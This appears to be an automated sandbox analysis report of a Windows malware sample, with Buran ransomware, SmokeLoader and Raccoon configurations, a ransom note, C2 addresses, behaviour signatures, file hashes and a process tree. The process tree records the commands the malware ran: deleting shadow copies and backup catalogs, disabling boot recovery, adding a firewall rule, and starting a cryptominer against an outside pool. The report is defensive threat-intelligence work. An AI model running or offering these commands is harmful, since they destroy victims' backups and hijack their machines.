Resubmissions

29-08-2021 09:08

210829-kbvd4yh12j 10

29-08-2021 09:00

210829-d9htsa2ade 10

Analysis

  • max time kernel
    219s
  • max time network
    1850s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    29-08-2021 09:08

General

  • Target

    bdf56d1d215d546e5add6dd065232224.exe

  • Size

    143KB

  • MD5

    bdf56d1d215d546e5add6dd065232224

  • SHA1

    07b2cc6992490266a7cce234e7a4e2efafc72bec

  • SHA256

    2bb5cb490caca6d8a0dc1bab96ce898765f1f88948a86cd777508319025e8950

  • SHA512

    2a7518c50d5884c8406d58e789457213c5e707279a7b6e2d7a42a9e7c8fbc3ed71ebcf796458efebacaea8d5bb56a3e4bef1c0379fb9a3dd85ea09bd27b95bf8

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 25F-CC2-5AC Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

fe582536ec580228180f270f7cb80a867860e010

Attributes
  • url4cnc

    https://telete.in/xylichanjk

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

d02c5d65069fc7ce1993e7c52edf0c9c4c195c81

Attributes
  • url4cnc

    https://telete.in/open3entershift

rc4.plain
rc4.plain

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bdf56d1d215d546e5add6dd065232224.exe
    "C:\Users\Admin\AppData\Local\Temp\bdf56d1d215d546e5add6dd065232224.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:564
    • C:\Users\Admin\AppData\Local\Temp\bdf56d1d215d546e5add6dd065232224.exe
      "C:\Users\Admin\AppData\Local\Temp\bdf56d1d215d546e5add6dd065232224.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1720
  • C:\Users\Admin\AppData\Local\Temp\24DF.exe
    C:\Users\Admin\AppData\Local\Temp\24DF.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:1128
  • C:\Users\Admin\AppData\Local\Temp\25CA.exe
    C:\Users\Admin\AppData\Local\Temp\25CA.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Modifies system certificate store
    PID:536
  • C:\Users\Admin\AppData\Local\Temp\27BE.exe
    C:\Users\Admin\AppData\Local\Temp\27BE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tbnohibk\
      2⤵
        PID:1260
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\apcykjco.exe" C:\Windows\SysWOW64\tbnohibk\
        2⤵
          PID:348
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create tbnohibk binPath= "C:\Windows\SysWOW64\tbnohibk\apcykjco.exe /d\"C:\Users\Admin\AppData\Local\Temp\27BE.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1824
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description tbnohibk "wifi internet conection"
            2⤵
              PID:972
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start tbnohibk
              2⤵
                PID:1428
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:824
              • C:\Users\Admin\AppData\Local\Temp\33C0.exe
                C:\Users\Admin\AppData\Local\Temp\33C0.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:1840
              • C:\Users\Admin\AppData\Local\Temp\3A66.exe
                C:\Users\Admin\AppData\Local\Temp\3A66.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:1544
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start
                  2⤵
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Modifies system certificate store
                  PID:1512
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                    3⤵
                      PID:1428
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        wmic shadowcopy delete
                        4⤵
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        PID:536
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                      3⤵
                        PID:904
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                        3⤵
                          PID:288
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                          3⤵
                            PID:1256
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                            3⤵
                              PID:1128
                              • C:\Windows\SysWOW64\vssadmin.exe
                                vssadmin delete shadows /all /quiet
                                4⤵
                                • Interacts with shadow copies
                                PID:1652
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                              3⤵
                                PID:1056
                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                  wmic shadowcopy delete
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:812
                                • C:\Windows\SysWOW64\vssadmin.exe
                                  vssadmin delete shadows /all /quiet
                                  4⤵
                                  • Interacts with shadow copies
                                  PID:2164
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -agent 0
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                PID:1936
                              • C:\Windows\SysWOW64\notepad.exe
                                notepad.exe
                                3⤵
                                  PID:2860
                              • C:\Windows\SysWOW64\notepad.exe
                                notepad.exe
                                2⤵
                                  PID:1824
                              • C:\Windows\SysWOW64\tbnohibk\apcykjco.exe
                                C:\Windows\SysWOW64\tbnohibk\apcykjco.exe /d"C:\Users\Admin\AppData\Local\Temp\27BE.exe"
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:1712
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  2⤵
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Modifies data under HKEY_USERS
                                  PID:1644
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                    3⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1832
                              • C:\Users\Admin\AppData\Local\Temp\3D05.exe
                                C:\Users\Admin\AppData\Local\Temp\3D05.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1584
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:1708
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                    PID:444
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:1552
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe
                                      1⤵
                                        PID:840
                                      • C:\Windows\SysWOW64\explorer.exe
                                        C:\Windows\SysWOW64\explorer.exe
                                        1⤵
                                          PID:808
                                        • C:\Windows\explorer.exe
                                          C:\Windows\explorer.exe
                                          1⤵
                                            PID:972
                                          • C:\Windows\SysWOW64\explorer.exe
                                            C:\Windows\SysWOW64\explorer.exe
                                            1⤵
                                              PID:336
                                            • C:\Windows\explorer.exe
                                              C:\Windows\explorer.exe
                                              1⤵
                                                PID:1536
                                              • C:\Windows\SysWOW64\explorer.exe
                                                C:\Windows\SysWOW64\explorer.exe
                                                1⤵
                                                  PID:900
                                                • C:\Windows\system32\vssvc.exe
                                                  C:\Windows\system32\vssvc.exe
                                                  1⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:276
                                                • C:\Windows\system32\taskeng.exe
                                                  taskeng.exe {F3910FA1-5418-40AF-9D1C-770F1B6CDA2F} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                                                  1⤵
                                                    PID:2280
                                                    • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                      C:\Users\Admin\AppData\Roaming\tbvwijd
                                                      2⤵
                                                        PID:2312
                                                        • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                          C:\Users\Admin\AppData\Roaming\tbvwijd
                                                          3⤵
                                                            PID:2344
                                                      • C:\Windows\system32\taskeng.exe
                                                        taskeng.exe {AB33D9D4-BBED-4C33-8EBD-8106324A4674} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                                                        1⤵
                                                          PID:1464
                                                          • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                            C:\Users\Admin\AppData\Roaming\tbvwijd
                                                            2⤵
                                                              PID:1956
                                                              • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                3⤵
                                                                  PID:1800
                                                            • C:\Windows\system32\taskeng.exe
                                                              taskeng.exe {BA849A18-1AF3-4166-9DFC-366B54DC1F01} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                                                              1⤵
                                                                PID:2200
                                                                • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                  C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                  2⤵
                                                                    PID:2152
                                                                    • C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                      C:\Users\Admin\AppData\Roaming\tbvwijd
                                                                      3⤵
                                                                        PID:2060

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v6

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                                                                    MD5

                                                                    5703edef7cb0f99305a6b18845e0443e

                                                                    SHA1

                                                                    fb6f022ebde210306e1a6575462d6451e98af454

                                                                    SHA256

                                                                    e4ce02059eb175c30879041d610db7b8798cdf57a4c67afc83c125c2db36e883

                                                                    SHA512

                                                                    4631853bda1498ff3cace6a348fd2d6770edd0fec166707c3afebff09644f34e29a7a6dd3e9cb167c40e8b5fa1fbbc80ba26d80b4d939daf56278c276b07ada4

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                                                                    MD5

                                                                    888f7457c332ac5e1897316e159f58c1

                                                                    SHA1

                                                                    a3047c6e978158dfae29b5735e8131ec1b30703d

                                                                    SHA256

                                                                    c2c14652875bfeb1ed529202da6d45eb974acab193c005908cf90b8c5cf3dd41

                                                                    SHA512

                                                                    0abdc5f78ade2f56b0f1954adc0479b5dcc88d401bfac95754e7dd80adefe7375a426fd89f81b657ebe9c113092524dcbd1e80c39a4bec51ccd93bc0bc3a5aff

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                    MD5

                                                                    2902de11e30dcc620b184e3bb0f0c1cb

                                                                    SHA1

                                                                    5d11d14a2558801a2688dc2d6dfad39ac294f222

                                                                    SHA256

                                                                    e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

                                                                    SHA512

                                                                    efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                                    MD5

                                                                    939460925953ce88e1086341b8a11bda

                                                                    SHA1

                                                                    06249b891050a9fac128ccfee943aeb5bede1c7b

                                                                    SHA256

                                                                    d4da3c5ff04a3b677eb77b1bfedc14e29ebd0d01c476d44a0b1a2366447ab016

                                                                    SHA512

                                                                    a8dc3eb58a4a550cc2551463a3d813396caf3f2b65f5b13c8e339a4a32652895ee15c23eb5ba833eca4e7c22331a622657cf5bd64098f0c54e43b4e92fe65f30

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                                                                    MD5

                                                                    da88e6ad0247cd5e59e2121eff87ac70

                                                                    SHA1

                                                                    480168cfee9d1c128500499ea6c903ae161de99f

                                                                    SHA256

                                                                    23d7c7a20dfc3dafc9e5fef691291ec16afca05a44c2550ff6cec55fafdb2443

                                                                    SHA512

                                                                    421f5df9bdb955e5210850c197efbe9e8335e831c011971a3fb9acbef16d4402a5ba164ee655c775ffbd152bef4af44c21d0225cce4ded0325cc333ec039632d

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                                                                    MD5

                                                                    c31e6ec656f0de534ddded1fb1ef1b5a

                                                                    SHA1

                                                                    d7f283dd4ab1ad240a73bec4627403a008a347dd

                                                                    SHA256

                                                                    4f6a9c9e8389bc75848b17f46b2a1790719a8e6673ff6fb6a544d2cde2263e06

                                                                    SHA512

                                                                    3a337f9c870b2d0b2b1d49444efee05cb6889e141ca1c4c66a89e2fb568ce97738be1bfbe63fb291a6dd30ef277c55503d731a20ab3b5e365293e9b0b9816b48

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                    MD5

                                                                    2d0242a82017315737c780622c17dcd2

                                                                    SHA1

                                                                    d6523213ae98b743b9a480054d3c1279f35cbca2

                                                                    SHA256

                                                                    d298ab052e68854e86e70ed4129de7da320bb6ae9a822be0b6196341adda225f

                                                                    SHA512

                                                                    11a4791000ddc413e094bb2b11fe5a0a32f36e24928d33f1694f075cdb40b3b234678529c23bb6ee5c492dd6c89ab654d73944e8755b5b39256a6b1e6f35e8ca

                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                                    MD5

                                                                    3ed5c37f6f7a268e8d566c29f9011297

                                                                    SHA1

                                                                    90482d78c481feaa904af6d45577bbd3f981ba8d

                                                                    SHA256

                                                                    cc5dfe397343d331ee5985ea14e868ef5af30f05fa13d4ea968692602b34868c

                                                                    SHA512

                                                                    73c4e7cdd10a708be9b45e20e584b6af63134c0fde44b944f04f1b7fc83f5f905e5959ec89cdeda17998a98115549bd2818fda7fe4022302b9ef22efaf183b2b

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L1Y3K90W\J2ZLS0HA.htm

                                                                    MD5

                                                                    b1cd7c031debba3a5c77b39b6791c1a7

                                                                    SHA1

                                                                    e5d91e14e9c685b06f00e550d9e189deb2075f76

                                                                    SHA256

                                                                    57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

                                                                    SHA512

                                                                    d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

                                                                  • C:\Users\Admin\AppData\Local\Temp\24DF.exe

                                                                    MD5

                                                                    a69e12607d01237460808fa1709e5e86

                                                                    SHA1

                                                                    4a12f82aee1c90e70cdf6be863ce1a749c8ae411

                                                                    SHA256

                                                                    188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc

                                                                    SHA512

                                                                    7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284

                                                                  • C:\Users\Admin\AppData\Local\Temp\25CA.exe

                                                                    MD5

                                                                    ff71c96860f7570bf49cfc4eaf8c8981

                                                                    SHA1

                                                                    3285e7622508cf2dc1248b7e3a3ca85b06dc1890

                                                                    SHA256

                                                                    993324955100beb9c2426b5b82293c60bc63fc1b054fc47ca6ede4a11cf564bf

                                                                    SHA512

                                                                    80ac5f477abaaf2ac5a8d87635b88e9acdb271e86f878fb2bfc4d56a9bd882b83fe3c2ab4bfd03ebc8387fa777b28cf875ae9313d38b95ce023b1f4dd51b3909

                                                                  • C:\Users\Admin\AppData\Local\Temp\27BE.exe

                                                                    MD5

                                                                    c0ea4d8f9f705ecbf626a2b8655b3103

                                                                    SHA1

                                                                    dc6c7f04d336f7a4cfe8ce0b6188d7b3b5678dba

                                                                    SHA256

                                                                    20574c07b98bdb3d9061236271d23aecd483595d0af0cc827278ed5c205f180d

                                                                    SHA512

                                                                    d6043e95cf9fccef8a5326d73742cf418f52bc284ce02ed5bd21e5c390d36e8cece33a9e8704c7f22ffe14b4307b12d3679790b99424848a3d90699c7aef2228

                                                                  • C:\Users\Admin\AppData\Local\Temp\27BE.exe

                                                                    MD5

                                                                    c0ea4d8f9f705ecbf626a2b8655b3103

                                                                    SHA1

                                                                    dc6c7f04d336f7a4cfe8ce0b6188d7b3b5678dba

                                                                    SHA256

                                                                    20574c07b98bdb3d9061236271d23aecd483595d0af0cc827278ed5c205f180d

                                                                    SHA512

                                                                    d6043e95cf9fccef8a5326d73742cf418f52bc284ce02ed5bd21e5c390d36e8cece33a9e8704c7f22ffe14b4307b12d3679790b99424848a3d90699c7aef2228

                                                                  • C:\Users\Admin\AppData\Local\Temp\33C0.exe

                                                                    MD5

                                                                    067a8002b76c49e820a9421fa3029c86

                                                                    SHA1

                                                                    fbf589bf5e44768d9ed07f6b361472e3b54bcb58

                                                                    SHA256

                                                                    9fdf1b38392cacb2490a8093fc910e2af3817e92ab459304d721919a63cbfe64

                                                                    SHA512

                                                                    4986054c30b069cc145dde03244589eb06513211723ca11cd97204c748b43c07b6f16bab7b9203c3d53a20176879eb467debf90bde43a5a66d23587243fed03a

                                                                  • C:\Users\Admin\AppData\Local\Temp\3A66.exe

                                                                    MD5

                                                                    bdfde890a781bf135e6eb4339ff9424f

                                                                    SHA1

                                                                    a5bfca4601242d3ff52962432efb15ab9202217f

                                                                    SHA256

                                                                    b7972505fc2b3b41383bc9022824130ef912145ff1d858555536df477c3a59f5

                                                                    SHA512

                                                                    7af519bbda4994a15789520a56b4a961187aa64ef284830a0e8a083cb5257f9606a7e4647278ce9e2c01995f627dc83aa0750b9f7a1273218618f65af0f2a15b

                                                                  • C:\Users\Admin\AppData\Local\Temp\3A66.exe

                                                                    MD5

                                                                    bdfde890a781bf135e6eb4339ff9424f

                                                                    SHA1

                                                                    a5bfca4601242d3ff52962432efb15ab9202217f

                                                                    SHA256

                                                                    b7972505fc2b3b41383bc9022824130ef912145ff1d858555536df477c3a59f5

                                                                    SHA512

                                                                    7af519bbda4994a15789520a56b4a961187aa64ef284830a0e8a083cb5257f9606a7e4647278ce9e2c01995f627dc83aa0750b9f7a1273218618f65af0f2a15b

                                                                  • C:\Users\Admin\AppData\Local\Temp\3D05.exe

                                                                    MD5

                                                                    e99afcbb149ba6dfbdd90c034b88fe73

                                                                    SHA1

                                                                    be974111ad0a8f3870d09706ea07b5438f418798

                                                                    SHA256

                                                                    924b9935b1f2be85aa36e0158f0a55c1200cdf9046077a5b491f1aeb034c2353

                                                                    SHA512

                                                                    bf8b1f544ab9e689068f94b7ee5cfbe304b3756308d022be2e487216dd01aed0fcc2ac76e5d6b4c2f434a1125a88d5c71a2ecdafdb7bddd82447e77601c6b4a9

                                                                  • C:\Users\Admin\AppData\Local\Temp\apcykjco.exe

                                                                    MD5

                                                                    4a3f72e06b588a4003a42c636eef5300

                                                                    SHA1

                                                                    9c96f26a2a4e6916c477979de2935e1f98fd4f1e

                                                                    SHA256

                                                                    4ab57b23bbecb1215fcb65339e4cae762efe202c8dadd5ae59b864b69540eec1

                                                                    SHA512

                                                                    8835a7470b5a40905d190972a9f1f120539242fe126381157a4e607049e1a06eadeece465ab7f36c0a0b20fb0916aed672d0ed04d87aabec54857d87f8e1a9ab

                                                                  • C:\Users\Admin\AppData\Local\Temp\~temp001.bat

                                                                    MD5

                                                                    ef572e2c7b1bbd57654b36e8dcfdc37a

                                                                    SHA1

                                                                    b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

                                                                    SHA256

                                                                    e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

                                                                    SHA512

                                                                    b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe

                                                                    MD5

                                                                    bdfde890a781bf135e6eb4339ff9424f

                                                                    SHA1

                                                                    a5bfca4601242d3ff52962432efb15ab9202217f

                                                                    SHA256

                                                                    b7972505fc2b3b41383bc9022824130ef912145ff1d858555536df477c3a59f5

                                                                    SHA512

                                                                    7af519bbda4994a15789520a56b4a961187aa64ef284830a0e8a083cb5257f9606a7e4647278ce9e2c01995f627dc83aa0750b9f7a1273218618f65af0f2a15b

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe

                                                                    MD5

                                                                    bdfde890a781bf135e6eb4339ff9424f

                                                                    SHA1

                                                                    a5bfca4601242d3ff52962432efb15ab9202217f

                                                                    SHA256

                                                                    b7972505fc2b3b41383bc9022824130ef912145ff1d858555536df477c3a59f5

                                                                    SHA512

                                                                    7af519bbda4994a15789520a56b4a961187aa64ef284830a0e8a083cb5257f9606a7e4647278ce9e2c01995f627dc83aa0750b9f7a1273218618f65af0f2a15b

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe

                                                                    MD5

                                                                    bdfde890a781bf135e6eb4339ff9424f

                                                                    SHA1

                                                                    a5bfca4601242d3ff52962432efb15ab9202217f

                                                                    SHA256

                                                                    b7972505fc2b3b41383bc9022824130ef912145ff1d858555536df477c3a59f5

                                                                    SHA512

                                                                    7af519bbda4994a15789520a56b4a961187aa64ef284830a0e8a083cb5257f9606a7e4647278ce9e2c01995f627dc83aa0750b9f7a1273218618f65af0f2a15b

                                                                  • C:\Users\Admin\AppData\Roaming\tbvwijd

                                                                    MD5

                                                                    bdf56d1d215d546e5add6dd065232224

                                                                    SHA1

                                                                    07b2cc6992490266a7cce234e7a4e2efafc72bec

                                                                    SHA256

                                                                    2bb5cb490caca6d8a0dc1bab96ce898765f1f88948a86cd777508319025e8950

                                                                    SHA512

                                                                    2a7518c50d5884c8406d58e789457213c5e707279a7b6e2d7a42a9e7c8fbc3ed71ebcf796458efebacaea8d5bb56a3e4bef1c0379fb9a3dd85ea09bd27b95bf8

                                                                  • C:\Users\Admin\AppData\Roaming\tbvwijd

                                                                    MD5

                                                                    bdf56d1d215d546e5add6dd065232224

                                                                    SHA1

                                                                    07b2cc6992490266a7cce234e7a4e2efafc72bec

                                                                    SHA256

                                                                    2bb5cb490caca6d8a0dc1bab96ce898765f1f88948a86cd777508319025e8950

                                                                    SHA512

                                                                    2a7518c50d5884c8406d58e789457213c5e707279a7b6e2d7a42a9e7c8fbc3ed71ebcf796458efebacaea8d5bb56a3e4bef1c0379fb9a3dd85ea09bd27b95bf8

                                                                  • C:\Users\Admin\AppData\Roaming\tbvwijd

                                                                    MD5

                                                                    bdf56d1d215d546e5add6dd065232224

                                                                    SHA1

                                                                    07b2cc6992490266a7cce234e7a4e2efafc72bec

                                                                    SHA256

                                                                    2bb5cb490caca6d8a0dc1bab96ce898765f1f88948a86cd777508319025e8950

                                                                    SHA512

                                                                    2a7518c50d5884c8406d58e789457213c5e707279a7b6e2d7a42a9e7c8fbc3ed71ebcf796458efebacaea8d5bb56a3e4bef1c0379fb9a3dd85ea09bd27b95bf8

                                                                  • C:\Users\Admin\Desktop\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

                                                                    MD5

                                                                    a09916857f8070601b3651307b27b5ba

                                                                    SHA1

                                                                    da755358d6d4f6b5f0ef7987a2da63d4b43557c9

                                                                    SHA256

                                                                    16cb9921eb4ec3560d552e54aa50672b6d0da848e263dcd12d6d31e132fc218b

                                                                    SHA512

                                                                    a4d374e31bab6f51359e144e909cfe64839f660c91cd53e1a4a9cab93f5d19e257f46fe392cad58bea3f2fce9eb7f198851c03e6cb42f09023ddcb24b81a9dd2

